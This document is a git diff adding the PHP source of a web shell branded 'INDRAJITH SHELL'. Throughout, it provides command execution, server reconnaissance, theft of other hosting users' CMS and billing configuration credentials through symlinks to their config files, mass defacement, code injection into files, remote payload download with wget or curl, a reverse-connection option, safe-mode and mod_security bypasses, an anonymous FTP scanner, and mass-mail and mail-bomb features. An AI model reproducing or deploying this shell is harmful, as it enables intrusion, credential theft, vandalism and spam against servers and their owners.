+ + + + "; + if(function_exists('apache_get_modules')) + { + echo ""; + } + if($os=='win') + { + echo " + + "; + } + if($os=='nix') + { + echo " + + + + + + + + + "; + $useful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); + $uze=array(); + foreach($useful as $uzeful) + { + if(cmd("which $uzeful")) + { + $uze[]=$uzeful; + } + } + echo ""; + $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); + $uze=array(); + foreach($downloaders as $downloader) + { + if(cmd("which $downloader")) + { + $uze[]=$downloader; + } + } + echo ""; + echo " + "; + } + echo "
+ OS: ".php_uname(s)."
PHP Version : ".phpversion().".
Kernel Release : ".php_uname(r)."
Kernel Version : ".php_uname(v)."
Machine : ".php_uname(m)." +
Server Software : ".$_SERVER['SERVER_SOFTWARE']."
Loaded Apache modules :

"; + echo implode(', ', apache_get_modules()); + echo "
Account Setting : 
".cmd('net accounts')."
User Accounts : 
".cmd('net user')."
Distro : 
".cmd('cat /etc/*-release')."
Distr name : 
".cmd('cat /etc/issue.net')."
GCC : 
".cmd('whereis gcc')."
PERL : 
".cmd('whereis perl')."
PYTHON : 
".cmd('whereis python')."
JAVA : 
".cmd('whereis java')."
APACHE : 
".cmd('whereis apache')."
CPU : 

".cmd('cat /proc/cpuinfo')."
RAM : 
".cmd('free -m')."
User Limits : 

".cmd('ulimit -a')."
Useful : 
";
+              echo implode(', ',$uze);
+              echo "
Downloaders : 
";
+              echo implode(', ',$uze);
+              echo "
Users : 
".wordwrap(get_users()).">
Hosts : 
".cmd('cat /etc/hosts')."




"; +} + +function remote_file_check_ui() +{ + echo "

Remote File Check



+ + +
URL :
Input File's Names in TextArea







"; +} + +function remote_file_check_bg() +{ + set_time_limit(0); + $rtr=array(); + echo "

Scanner Report



"; + $webz=$_POST['rem_web']; + $uri_in=$_POST['tryzzz']; + $r_xuri = trim($uri_in); + $r_xuri=explode("\n", $r_xuri); + foreach($r_xuri as $rty) + { + $urlzzx=$webz.$rty; + if(function_exists('curl_init')) + { + echo ""; + $ch = curl_init($urlzzx); + curl_setopt($ch, CURLOPT_NOBODY, true); + curl_exec($ch); + $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE); + curl_close($ch); + if($status_code==200) + { + echo ""; + } + else + { + echo ""; + } + } + else + { + echo "cURL Not Found "; + break; + } + } + echo "
Checking : $urlzzx Found....
Not Found...




"; +} + +function remote_download_ui() +{ + echo "

Remote File Download



+ +
URL




"; +} + +function remote_download_bg() +{ + chdir($_GET['path']); + global $os; + $opt=$_GET['type_r_down']; + $rt_ffile=$_GET['rurlfile']; + $name=basename($rt_ffile); + echo "
"; + switch($opt) + { + case "WGET": + if($os!='win') + { + cmd("wget $rt_ffile"); + alert("Downloaded Successfully..."); + } + else + { + alert("Its Windows OS... WGET is not available"); + } + break; + case "cURL": + if(function_exists('curl_init')) + { + $ch = curl_init($rt_ffile); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); + $data = curl_exec($ch); + curl_close($ch); + file_put_contents($name, $data); + alert("Download succeeded"); + } + else + { + alert("cURL Not Available"); + } + break; + } + echo "
"; +} + +function hex_encode_ui() +{ + if(isset($_REQUEST['hexinp']) && isset($_REQUEST['tyxxx'])) + { + $tyx=$_POST['tyxxx']; + $rezultzz=$_POST['hexinp']; + switch($tyx) + { + case "Encode": + $rzul=PREG_REPLACE("'(.)'e","dechex(ord('\\1'))",$rezultzz); + echo "

HEXADECIMAL ENCODER



+ +

+ Input :



"; + break; + case "Decode": + $rzul=PREG_REPLACE("'([\S,\d]{2})'e","chr(hexdec('\\1'))",$rezultzz); + echo "

HEXADECIMAL ENCODER



+ +

+ Input :



"; + break; + } + } + else + { + echo "

HEXADECIMAL ENCODER



+ +

+ Input :



"; + } +} + +function killme() +{ + global $self; + echo "

Good Bye Dear

Dear, Good by... :( Hope You Like me...




"; + $me=basename($self); + unlink($me); +} + +function ftp_anonymous_ui() +{ + echo "

Anonymous FTP Scanner





"; +} + +function ftp_anonymous_bg() +{ + echo "

Result



"; + $ftp_list=$_GET['ftp_anonz']; + $xftpl = trim($ftp_list); + $xftpl = explode("\n", $xftpl); + foreach($xftpl as $xftp) + { + $xftp = str_replace("ftp://", "", $xftp); + $conn_ftp = ftp_connect($xftp); + $success = ftp_login($conn_ftp, "anonymous", ""); + if($success) + { + echo ""; + } + else + { + echo ""; + } + + } + echo "
$xftpSuccessfull
$xftpFailed




"; +} + +function mass_deface_ui() +{ + echo "

Mass Deface



+
Name :




"; +} + +function mass_deface_bg() +{ + global $sep; + $d_path=$_GET['mm_path']; + chdir($d_path); + $d_file=$_GET['mass_name']; + $d_conten=$_GET['mass_cont']; + if(is_dir($d_path)) + { + chdir($d_path); + $d_dirs=array(); + if($handle=opendir($d_path)) + { + while(($item=readdir($handle))!==FALSE) + { + if($item=="."){continue;} + if($item==".."){continue;} + if(is_dir($item)) + { + array_push($d_dirs, $item); + } + } + } + } + echo "

Result



"; + foreach($d_dirs as $d_dir) + { + $xd_path=getcwd()."$sep$d_dir$sep$d_file"; + if(is_writable($d_dir)) + { + $handle=fopen($xd_path, "wb"); + if($handle) + { + fwrite($handle, $d_conten); + } + } + echo ""; + } + echo "
$xd_path




"; +} + + +function symlinkg($usernamexx,$domainxx) +{ + symlink('/home/'.$usernamexx.'/public_html/vb/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin1.txt'); + symlink('/home/'.$usernamexx.'/public_html/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin2.txt'); + symlink('/home/'.$usernamexx.'/public_html/forum/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin3.txt'); + symlink('/home/'.$usernamexx.'/public_html/cc/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin4.txt'); + symlink('/home/'.$usernamexx.'/public_html/inc/config.php','Indrajith/'.$domainxx.' =>mybb.txt'); + symlink('/home/'.$usernamexx.'/public_html/config.php','Indrajith/'.$domainxx.' =>Phpbb1.txt'); + symlink('/home/'.$usernamexx.'/public_html/forum/includes/config.php','Indrajith/'.$domainxx.' =>Phpbb2.txt'); + symlink('/home/'.$usernamexx.'/public_html/wp-config.php','Indrajith/'.$domainxx.' =>Wordpress1.txt'); + symlink('/home/'.$usernamexx.'/public_html/blog/wp-config.php','Indrajith/'.$domainxx.' =>Wordpress2.txt'); + symlink('/home/'.$usernamexx.'/public_html/configuration.php','Indrajith/'.$domainxx.' =>Joomla1.txt'); + symlink('/home/'.$usernamexx.'/public_html/blog/configuration.php','Indrajith/'.$domainxx.' =>Joomla2.txt'); + symlink('/home/'.$usernamexx.'/public_html/joomla/configuration.php','Indrajith/'.$domainxx.' =>Joomla3.txt'); + symlink('/home/'.$usernamexx.'/public_html/whm/configuration.php','Indrajith/'.$domainxx.' =>Whm1.txt'); + symlink('/home/'.$usernamexx.'/public_html/whmc/configuration.php','Indrajith/'.$domainxx.' =>Whm2.txt'); + symlink('/home/'.$usernamexx.'/public_html/support/configuration.php','Indrajith/'.$domainxx.' =>Whm3.txt'); + symlink('/home/'.$usernamexx.'/public_html/client/configuration.php','Indrajith/'.$domainxx.' =>Whm4.txt'); + symlink('/home/'.$usernamexx.'/public_html/billings/configuration.php','Indrajith/'.$domainxx.' =>Whm5.txt'); + symlink('/home/'.$usernamexx.'/public_html/billing/configuration.php','Indrajith/'.$domainxx.' =>Whm6.txt'); + symlink('/home/'.$usernamexx.'/public_html/clients/configuration.php','Indrajith/'.$domainxx.' =>Whm7.txt'); + symlink('/home/'.$usernamexx.'/public_html/whmcs/configuration.php','Indrajith/'.$domainxx.' =>Whm8.txt'); + symlink('/home/'.$usernamexx.'/public_html/order/configuration.php','Indrajith/'.$domainxx.' =>Whm9.txt'); + symlink('/home/'.$usernamexx.'/public_html/admin/conf.php','Indrajith/'.$domainxx.' =>5.txt'); + symlink('/home/'.$usernamexx.'/public_html/admin/config.php','Indrajith/'.$domainxx.' =>4.txt'); + symlink('/home/'.$usernamexx.'/public_html/conf_global.php','Indrajith/'.$domainxx.' =>invisio.txt'); + symlink('/home/'.$usernamexx.'/public_html/include/db.php','Indrajith/'.$domainxx.' =>7.txt'); + symlink('/home/'.$usernamexx.'/public_html/connect.php','Indrajith/'.$domainxx.' =>8.txt'); + symlink('/home/'.$usernamexx.'/public_html/mk_conf.php','Indrajith/'.$domainxx.' =>mk-portale1.txt'); + symlink('/home/'.$usernamexx.'/public_html/include/config.php','Indrajith/'.$domainxx.' =>12.txt'); + symlink('/home/'.$usernamexx.'/public_html/settings.php','Indrajith/'.$domainxx.' =>Smf.txt'); + symlink('/home/'.$usernamexx.'/public_html/includes/functions.php','Indrajith/'.$domainxx.' =>phpbb3.txt'); + symlink('/home/'.$usernamexx.'/public_html/include/db.php','Indrajith/'.$domainxx.' =>infinity.txt'); +} + +function config_grabber_bg() +{ + global $sym_htaccess,$sym_php_ini; + mkdir('INDRAJITH', 0777); + symlink("/", "INDRAJITH/root"); + $htaccess=fopen('INDRAJITH/.htaccess', 'wb'); + fwrite($htaccess,$sym_htaccess); + $php_ini_x=fopen('INDRAJITH/php.ini', 'wb'); + fwrite($php_ini_x, $sym_php_ini); + $usr=explode("\n",$_POST['user_z_list']); + foreach($usr as $uzer) + { + $u_er=trim($uzer); + symlinggg($u_er); + } + echo ""; + alert('Config Grab compted. Check configs in direcory INDRAJITH'); +} + +if(isset($_POST['user_z_list'])) +{ + config_grabber_bg(); +} + + +function config_grabber_ui() +{ + if(file('/etc/passwd')) + { + ?>

Config Grabber







blog/configuration.php"); + symlink('/home/'.$user.'/public_html/forum/includes/config.php', "INDRAJITH/".$user." =>forum/includes/config.php"); + symlink("/home/".$user."/public_html/wp-config.php", "INDRAJITH/".$user." =>wp-config.php"); + symlink("/home/".$user."/public_html/wordpress/wp-config.php", "INDRAJITH/".$user." =>wordpress/wp-config.php"); + symlink("/home/".$user."/public_html/configuration.php", "INDRAJITH/".$user." =>configuration.php"); + symlink("/home/".$user."/public_html/blog/wp-config.php", "INDRAJITH/".$user." =>blog/wp-config.php"); + symlink("/home/".$user."/public_html/joomla/configuration.php", "INDRAJITH/".$user." =>joomla/configuration.php"); + symlink("/home/".$user."/public_html/vb/includes/config.php", "INDRAJITH/".$user." =>vb/includes/config.php"); + symlink("/home/".$user."/public_html/includes/config.php", "INDRAJITH/".$user." =>includes/config.php"); + symlink("/home/".$user."/public_html/conf_global.php", "INDRAJITH/".$user." =>conf_global.php"); + symlink("/home/".$user."/public_html/inc/config.php", "INDRAJITH/".$user." =>inc/config.php"); + symlink("/home/".$user."/public_html/config.php", "INDRAJITH/".$user." =>config.php"); + symlink("/home/".$user."/public_html/Settings.php", "INDRAJITH/".$user." =>/Settings.php"); + symlink("/home/".$user."/public_html/sites/default/settings.php", "INDRAJITH/".$user." =>sites/default/settings.php"); + symlink("/home/".$user."/public_html/whm/configuration.php", "INDRAJITH/".$user." =>whm/configuration.php"); + symlink("/home/".$user."/public_html/whmcs/configuration.php", "INDRAJITH/".$user." =>whmcs/configuration.php"); + symlink("/home/".$user."/public_html/support/configuration.php", "INDRAJITH/".$user." =>support/configuration.php"); + symlink("/home/".$user."/public_html/whmc/WHM/configuration.php", "INDRAJITH/".$user." =>whmc/WHM/configuration.php"); + symlink("/home/".$user."/public_html/whm/WHMCS/configuration.php", "INDRAJITH/".$user." =>whm/WHMCS/configuration.php"); + symlink("/home/".$user."/public_html/whm/whmcs/configuration.php", "INDRAJITH/".$user." =>whm/whmcs/configuration.php"); + symlink("/home/".$user."/public_html/support/configuration.php", "INDRAJITH/".$user." =>support/configuration.php"); + symlink("/home/".$user."/public_html/clients/configuration.php", "INDRAJITH/".$user." =>clients/configuration.php"); + symlink("/home/".$user."/public_html/client/configuration.php", "INDRAJITH/".$user." =>client/configuration.php"); + symlink("/home/".$user."/public_html/clientes/configuration.php", "INDRAJITH/".$user." =>clientes/configuration.php"); + symlink("/home/".$user."/public_html/cliente/configuration.php", "INDRAJITH/".$user." =>cliente/configuration.php"); + symlink("/home/".$user."/public_html/clientsupport/configuration.php", "INDRAJITH/".$user." =>clientsupport/configuration.php"); + symlink("/home/".$user."/public_html/billing/configuration.php", "INDRAJITH/".$user." =>billing/configuration.php"); + symlink("/home/".$user."/public_html/admin/config.php", "INDRAJITH/".$user." =>admin/config.php"); +} + +function sym_xxx() +{ + global $sym_htaccess,$sym_php_ini; + mkdir('Indrajith', 0777); + symlink("/", "Indrajith/root"); + $htaccess=@fopen('Indrajith/.htaccess', 'w'); + fwrite($htaccess,$sym_htaccess); + $php_ini_x=fopen('Indrajith/php.ini', 'w'); + fwrite($php_ini_x, $sym_php_ini); + $akps = implode(file("/etc/named.conf")); + if(!$akps) + { + config_grabber_ui(); + } + else + { + $usrd = array(); + foreach($akps as $akp) + { + if(eregi("zone", $akp)) + { + preg_match_all('#zone "(.*)" #', $akp, $akpzz); + flush(); + if(strlen(trim($akpzz[1][0]))>2) + { + $user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0])); + symlinkg($akpzz[1][0],$user['name']); + flush(); + } + } + } + } +} + +function sym_link() +{ + global $sym_htaccess,$sym_php_ini; + cmd('rm -rf AKP'); + mkdir('AKP', 0755); + $usrd = array(); + $akps = implode(file("/etc/named.conf")); + $htaccess=fopen('AKP/.htaccess', 'w'); + fwrite($htaccess,$sym_htaccess); + $php_ini_x=fopen('AKP/php.ini', 'w'); + fwrite($php_ini_x, $sym_php_ini); + symlink("/", "AKP/root"); + if(!$file) + { + echo ""; + echo "

SymLink



"; + $users = file('/etc/passwd'); + foreach($users as $user) + { + $user = explode(':', $user); + echo ""; + } + echo "
UsersExploit
".$user[0]."SymLink




"; + + } + else + { + echo ""; + foreach($akps as $akp) + { + if(eregi("zone", $akp)) + { + preg_match_all('#zone "(.*)" #', $akp, $akpzz); + flush(); + if(strlen(trim($akpzz[1][0]))>2) + { + $user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0])); + echo "
DomainsUsersExploit
".$akpzz[1][0]."".$user['name']."SymLink
"; + flush(); + } + } + } + } +} + +function shell_finder_ui() +{ + echo "

SH3LL SCANNER




URL :




"; +} + +function shell_finder_bg() +{ + $sh_url=$_GET['sh311_scanx']; + echo "

SHELL SCAN



"; + $ShellZ=array("indrajith.php", "c99.php", "c100.php","r57.php", "b374k.php", "c22.php", "sym.php", "symlink_sa.php", "r00t.php", "webr00t.php", "sql.php","cpanel.php", "wso.php", "404.php", "aarya.php", "greenshell.php", "ddos.php", "madspot.php", "1337.php", "31337.php", "WSO.php", "dz.php", "cpn.php", "sh3ll.php", "mysql.php", "killer.php", "cgishell.pl", "dz0.php", "whcms.php", "vb.php", "gaza.php", "d0mains.php", "changeall.php", "h4x0r.php", "L3b.php", "uploads.php", "shell.asp", "cmd.asp", "sh3ll.asp", "b374k-2.2.php", "m1n1.php", "b374km1n1.php"); + foreach($ShellZ as $shell) + { + $urlzzx=$sh_url.$shell; + if(function_exists('curl_init')) + { + echo ""; + $ch = curl_init($urlzzx); + curl_setopt($ch, CURLOPT_NOBODY, true); + curl_exec($ch); + $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE); + curl_close($ch); + if($status_code==200) + { + echo ""; + } + else + { + echo ""; + } + } + else + { + echo "cURL Not Found "; + break; + } + } + echo "
Checking : $urlzzx Found....
Not Found...




"; +} + +function code_in_ui() +{ + global $sep; + $mode=$_POST['modexxx']; + $ftype=$_POST['ffttype']; + $c_cont=$_POST['code_cont']; + $ppp=$_POST['path']; + if(isset($_POST['modexxx']) && isset($_POST['path']) && isset($_POST['ffttype']) && isset($_POST['code_cont']) && $mode!="" && $ftype!="" && $c_cont!="" && $ppp!="") + { + echo "

Successfully c0d3 inj3cted

"; + switch($mode) + { + case "Apender": + $mmode="a"; + break; + case "Rewrite": + $mmode="w"; + break; + } + if($handle = opendir($ppp)) + { + while(($c_file = readdir($handle)) !== False) + { + if((preg_match("/$ftype".'$'.'/', $c_file , $matches) != 0) && (preg_match('/'.$c_file.'$/', $self , $matches) != 1)) + { + echo ""; + $fd = fopen($ppp.$sep.$c_file,$mmode); + if($fd) + { + fwrite($fd,$c_cont); + } + else + { + alert("Error. Access Denied"); + } + } + } + } + echo "
$ppp$sep$c_file




"; + } + else + { + ?> +

c0de inj3ct



+ +
Mode :
File Type
Content :




+ +

SSH Manager



HOST :
Username :
Password :




+ +

SSH Shell by Indrajith Shell



+
CMD :




+ +

SSH Shell by Indrajith Shell



+
CMD :




+ +

FTP Manager



+ + + + + +
HOST :
Username :
Password :
Path [Optional] :
Upload File From Server [Optional] :
Download File To Server [Optional] :




+

FTP FILEMANAGER

"; + $fhost=$_GET['ftp_host']; + $fuser=$_GET['ftp_user']; + $fpass=$_GET['ftp_pass']; + $fpath=$_GET['fpath']; + $upl=$_GET['upload_file']; + $down=$_GET['download_file']; + if($fpath=="") + { + $fpath=ftp_pwd($conn); + } + $conn=ftp_connect($fhost); + if(!$conn) + { + alert("FTP Host Not Found!!!"); + } + $log=ftp_login($conn, $fuser, $fpass); + if(!$log) + { + alert("FTP Authorication Failed"); + } + if($upl!="") + { + $fp = fopen($upl, 'r'); + if (ftp_fput($conn, $upl, $fp, FTP_ASCII)) + { + echo "
Successfully uploaded $upl
"; + } + else + { + echo "
There was a problem while uploading $upl
"; + } + } + if($down!="") + { + $handle = fopen($down, 'w'); + if (ftp_fget($conn, $handle, $down, FTP_ASCII, 0)) + { + echo "
successfully written to $down
"; + } + else + { + echo "
There was a problem while downloading $down to $down
"; + } + } + echo ""; + ftp_chdir($fpath); + $list=ftp_rawlist($conn, $fpath); + foreach($list as $fff) + { + echo ""; + } + echo "
Files
$fff
"; +} + +//////////////////////////////// Frond End Calls /////////////////////////////// + +if(isset($_POST['e_file']) && isset($_POST['e_content_n'])) +{ + edit_file_bg(); +} + +else if(isset($_REQUEST['sh311_scanner'])) +{ + shell_finder_ui(); +} + +else if(isset($_REQUEST['ftp_host']) && isset($_REQUEST['ftp_user']) && isset($_REQUEST['ftp_pass'])) +{ + ftp_man_bg(); +} + +else if(isset($_REQUEST['ftpman'])) +{ + ftp_man_ui(); +} + +else if(isset($_GET['ssh_host']) && isset($_GET['ssh_user']) && isset($_GET['ssh_pass'])) +{ + ssh_man_bg(); +} + +else if(isset($_REQUEST['sshman'])) +{ + ssh_man_ui(); +} + +else if(isset($_REQUEST['c0de_inject']) && isset($_REQUEST['path'])) +{ + chdir($_GET['path']); + code_in_ui(); +} + +else if(isset($_GET['sh311_scanx'])) +{ + shell_finder_bg(); +} + +else if(isset($_REQUEST['config_grab'])) +{ + sym_xxx(); +} + +else if(isset($_REQUEST['ftp_man'])) +{ + ftp_man_ui(); +} + +else if(isset($_REQUEST['mass_xploit'])) +{ + mass_deface_ui(); +} + +else if(isset($_GET['f_host']) && isset($_GET['f_user']) && isset($_GET['f_pass'])) +{ + ftp_man_bg(); +} + +else if(isset($_GET['mass_name']) && isset($_GET['mass_cont'])) +{ + mass_deface_bg(); +} + +else if(isset($_REQUEST['ftp_anon_scan'])) +{ + ftp_anonymous_ui(); +} + +else if(isset($_GET['ftp_anonz'])) +{ + ftp_anonymous_bg(); +} + +else if(isset($_REQUEST['killme'])) +{ + killme(); +} + +else if(isset($_REQUEST['hexenc'])) +{ + hex_encode_ui(); +} + +else if(isset($_REQUEST['remotefiledown'])) +{ + remote_download_ui(); +} + +else if(isset($_GET['type_r_down']) && isset($_GET['rurlfile']) && isset($_GET['path'])) +{ + remote_download_bg(); +} + +else if(isset($_REQUEST['cpanel_crack'])) +{ + cpanel_crack(); +} + +else if(isset($_REQUEST['rem_web']) && isset($_REQUEST['tryzzz'])) +{ + remote_file_check_bg(); +} + +else if(isset($_REQUEST['typed']) && isset($_REQUEST['typenc']) && isset($_REQUEST['php_content'])) +{ + php_ende_bg(); +} + +else if(isset($_REQUEST['remote_server_scan'])) +{ + remote_file_check_ui(); +} + +else if(isset($_REQUEST['server_exploit_details'])) +{ + exploit_details(); +} + +else if(isset($_REQUEST['from']) && isset($_REQUEST['to_mail']) && isset($_REQUEST['subject_mail']) && isset($_REQUEST['mail_content'])) +{ + massmailer_bg(); +} + +else if(isset($_REQUEST['mysqlman'])) +{ + mysqlman(); +} + +else if(isset($_REQUEST['bomb_to']) && isset($_REQUEST['bomb_subject']) && isset($_REQUEST['bmail_content'])) +{ + mailbomb_bg(); +} + +else if(isset($_REQUEST['cookiejack'])) +{ + cookie_jack(); +} + +else if(isset($_REQUEST['massmailer'])) +{ + massmailer_ui(); +} + +else if(isset($_REQUEST['rename'])) +{ + chdir($_GET['path']); + rename_ui(); +} + +else if(isset($_GET['old_name']) && isset($_GET['new_name'])) +{ + chdir($_GET['path']); + rename_bg(); +} + +else if(isset($_REQUEST['encodefile'])) +{ + php_ende_ui(); +} + +else if(isset($_REQUEST['edit'])) +{ + edit_file(); +} + +else if(isset($_REQUEST['down']) && isset($_REQUEST['path'])) +{ + download(); +} + +else if(isset($_REQUEST['gzip']) && isset($_REQUEST['path'])) +{ + download_gzip(); +} + +else if(isset($_REQUEST['read'])) +{ + chdir($_GET['path']); + code_viewer(); +} + +else if(isset($_REQUEST['perm'])) +{ + chdir($_GET['path']); + ch_perm_ui(); +} + +else if(isset($_GET['path']) && isset($_GET['p_filex']) && isset($_GET['new_perm'])) +{ + chdir($_GET['path']); + ch_perm_bg(); +} + +else if(isset($_REQUEST['del_fil'])) +{ + chdir($_GET['path']); + delete_file(); + exit; +} +else if(isset($_REQUEST['phpinfo'])) +{ + chdir($_GET['path']); + ob_clean(); + echo phpinfo(); + exit; +} +else if(isset($_REQUEST['del_dir'])) +{ + chdir($_GET['path']); + $d_dir=$_GET['del_dir']; + deldirs($d_dir); +} +else if(isset($_GET['path']) && isset($_GET['new_file'])) +{ + chdir($_GET['path']); + mk_file_ui(); +} +else if(isset($_GET['path']) && isset($_GET['new_f_name']) && isset($_GET['n_file_content'])) +{ + mk_file_bg(); +} +else if(isset($_GET['path']) && isset($_GET['new_dir'])) +{ + chdir($_GET['path']); + create_dir(); +} +else if(isset($_GET['path']) && isset($_GET['cmdexe'])) +{ + chdir($_GET['path']); + cmd(); +} +else if(isset($_POST['upload_f']) && isset($_POST['path'])) +{ + upload_file(); +} +else if(isset($_REQUEST['rs'])) +{ + reverse_conn_ui(); +} +else if(isset($_GET['rev_option']) && isset($_GET['my_ip']) && isset($_GET['my_port'])) +{ + reverse_conn_bg(); +} +else if(isset($_REQUEST['safe_mod']) && isset($_REQUEST['path'])) +{ + chdir($_GET['path']); + safe_mode_fuck_ui(); +} +else if(isset($_GET['path']) && isset($_GET['safe_mode'])) +{ + safe_mode_fuck(); +} +else if(isset($_GET['path']) && isset($_REQUEST['forbd_dir'])) +{ + AccessDenied(); +} + +else if(isset($_REQUEST['symlink'])) +{ + sym_link(); +} + +else if(isset($_GET['path']) && isset($_GET['copy'])) +{ + copy_file_ui(); +} +else if(isset($_GET['c_file']) && isset($_GET['c_target']) &&isset($_GET['cn_name'])) +{ + copy_file_bg(); +} +else +{ + filemanager_bg(); +} + +////////////////////////////// End Frond End Calls ////////////////////////////// + +echo "

+
PWD :
+ + + + + + + + +
New File :
+
: New Dir
+
CMD :
+
: Upload File
+

© AJITH KP & VISHNU NATH KP ©
® TOF [2012] ®

" +?> diff --git a/php/indrajith.txt b/php/indrajith.txt new file mode 100644 index 0000000..cefb2ba --- /dev/null +++ b/php/indrajith.txt @@ -0,0 +1,1782 @@ +"; + echo ""; + if($_COOKIE["user"] != $usernameame && $_COOKIE["pass"] != md5($password)) + { + if($_POST["usrname"]==$usernameame && $_POST["passwrd"]==$password) + { + print''; + } + else + { + if($_POST['usrname']) + { + print''; + } + echo 'INDRAJITH SHELL
+

+ >>>>>>>>>>>>>>><<<<<>>>>>>>>>> +

+
+
INDRAJITH SHELL
+
+ + +
+ + +
Login:
Password:
 
+
'; + exit; + } + } + + +$color_g="green"; +$color_b="4C83AF"; +$color_bg="#111111"; +$color_hr="#222"; +$color_wri="green"; +$color_rea="yellow"; +$color_non="red"; +$path=$_GET['path']; + +@session_start(); +//@error_reporting(5); +@set_time_limit(0); +@ini_restore("safe_mode_include_dir"); +@ini_restore("safe_mode_exec_dir"); +@ini_restore("disable_functions"); +@ini_restore("allow_url_fopen"); +@ini_restore("safe_mode"); +@ini_restore("open_basedir"); + +$sep="/"; +if(strtolower(substr(PHP_OS,0,3))=="win") +{ + $os="win"; + $sep="\\"; + $ox="Windows"; +} +else +{ + $os="nix"; + $ox="Linux"; +} + + + +$self=$_SERVER['PHP_SELF']; +$srvr_sof=$_SERVER['SERVER_SOFTWARE']; +$your_ip=$_SERVER['REMOTE_ADDR']; +$srvr_ip=$_SERVER['SERVER_ADDR']; +$admin=$_SERVER['SERVER_ADMIN']; + +$s_php_ini="safe_mode=OFF +disable_functions=NONE"; + +$ini_php=""; + +$s_htaccess=" +Sec------Engine Off +Sec------ScanPOST Off +"; + +$s_htaccess_pl="Options FollowSymLinks MultiViews Indexes ExecCGI +AddType application/x-httpd-cgi .sh +AddHandler cgi-script .pl +AddHandler cgi-script .pl"; + +$sym_htaccess="Options all +DirectoryIndex Sux.html +AddType text/plain .php +AddHandler server-parsed .php +AddType text/plain .html +AddHandler txt .html +Require None +Satisfy Any"; + +$sym_php_ini="safe_mode=OFF +disable_functions=NONE"; + +$forbid_dir="Options -Indexes"; + +$cookie_highjacker="rVVdc5pAFH13xv9wh3Eipq22M3miasaJGGmNWsS2mU6HQVyEFlnCLkk7If+9d8EPCKFtpuVB2d1z7z177gf1Wvc8dMN6rXP6av/AJQlIZHGyBouBBaEVcaAOaNOhPninGWNYjNXJBMKIfiM2h53Zaadec+LA5h4N0AXX5nKrXruv1wAfzwF5QzgJbmVpbBhz82KiqVPD1OZSC05OgPHIthixt2El7CVIcfA9oHeB1GplXnfOxdPwQuhBle3bDPiQ/RGfkTKjz+Zopn8a6EN1KN5+z6sEfja7koc/cNTVq5mhmoPhsJpaAfMcRgXDCiIeY4TLDXOh6h9V/UszZ9P8mjKqOHtEtgL1N3QrTMuEK+wPEYoWEeFxFMiIEXd/yJWxTzdDi1u5QkbQhG56kk0Dx9vE2CaIY23+g++dNmxKv3ukQPfDUtWvzYWha9PLA99GRDYe4yQyNz5dWT5DE3lFqd8CL/BMzI3cPEJSRHOfHJGQkn2rmNWCSHvDNJ0ZbNejeHDgszVDis3+hNLzmW4cmccMo1obEhSxaWEvcWUOLrH1cje9YdzcEu7SdcHgSjXGs2Feka3pUvYkg/FskfdIHBKRqBxeV0eqrh6rorHGSdYTPyBLPqwXYpSN4BpcxVMYDA713sBk9xwakkCWsixLWJPWC+mokFA9RNXNrcVtV5Y6K5dvVx0PgZlFC5IESgi/ACkXtxPGnMkiPgbU5kqanwSE5EouKwkICZScSgkMRA6UQkISyFRVirIngMooR+ESGA4M9R4UeMg0wp2L2ey9pirHGu6uov5TA+F/XuGf7pBeQqm+QBA8pu/YPmUkpbrr9kOT45LYLgWpXuuKtPW7LrHWfVxxj/ukf/b6DKaUw4jGwbrbyTbxtJPCuiu6/imW7pt+DoUr3Av7hktw0NzEhIkP61KfgNQuFDnOiIVhLnUNJ2Zbgjv89gboxhFuAGcRdz0GKNEtidrdTpgGTkOKwXOOy18="; + +/*----------------------- Top Menu ------------------------------------------*/ + +if($safemode=="On") +{ + echo ""; +} +else +{ + echo ""; +} + +echo ""; + +echo "INDRAJITH SHELL
+ + + + + + + +
+
+

INDRAJITH

MINI SHELL +
+ 		+
OS : + ".$ox." | ".php_uname()."
+ Your IP : ".$your_ip." | Server IP : ".$srvr_ip." | Admin : {$admin}
+ MySQL : "; echo mysqlx(); + echo " | Oracle : "; echo oraclesx(); + echo " | MSSQL : "; echo mssqlx(); + echo " | PostGreySQL : ";echo postgreyx(); + echo "
cURL : ";echo curlx(); + echo " | Total Space : "; echo disc_size(); + echo " | Free Space : "; echo freesize(); + echo "
Software : {$srvr_sof} | PHP : ".phpversion()." +
Disabled Functions : ";echo disabled_functns()."
"; + if($os == 'win'){ echo "Drives : ";echo drivesx(); } + echo " +
+
"; +echo "
"; +/*----------------------- End of Top Menu -----------------------------------*/ + + +/*--------------- FUNCTIONS ----------------*/ +function alert($alert_txt) +{ + echo ""; +} + +function disabled_functns() +{ + if(!@ini_get('disable_functions')) + { + echo "None"; + } + else + { + echo @ini_get('disable_functions'); + } +} + + +function drivesx() +{ + foreach(range('A','Z') as $drive) + { + if(is_dir($drive.':\\')) + { + echo "[".$drive."]"; + } + } +} + +function filesizex($size) +{ + if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB"; + elseif ($size>=1048576)$size = round(($size/1048576),2)." MB"; + elseif ($size>=1024)$size = round(($size/1024),2)." KB"; + else $size .= " B"; + return $size; +} + +function disc_size() +{ + echo filesizex(disk_total_space("/")); +} + +function freesize() +{ + echo filesizex(disk_free_space("/")); +} + +function file_perm($filz){ + if($m=fileperms($filz)){ + $p=''; + $p .= ($m & 00400) ? 'r' : '-'; + $p .= ($m & 00200) ? 'w' : '-'; + $p .= ($m & 00100) ? 'x' : '-'; + $p .= ($m & 00040) ? 'r' : '-'; + $p .= ($m & 00020) ? 'w' : '-'; + $p .= ($m & 00010) ? 'x' : '-'; + $p .= ($m & 00004) ? 'r' : '-'; + $p .= ($m & 00002) ? 'w' : '-'; + $p .= ($m & 00001) ? 'x' : '-'; + return $p; + } + else return "?????"; +} + + +function mysqlx() +{ + if(function_exists('mysql_connect')) + { + echo "Enabled"; + } + else + { + echo "Disabled"; + } +} + +function oraclesx() +{ + if(function_exists('oci_connect')) + { + echo "Enabled"; + } + else + { + echo "Disabled"; + } +} + +function mssqlx() +{ + if(function_exists('mssql_connect')) + { + echo "Enabled"; + } + else + { + echo "Disabled"; 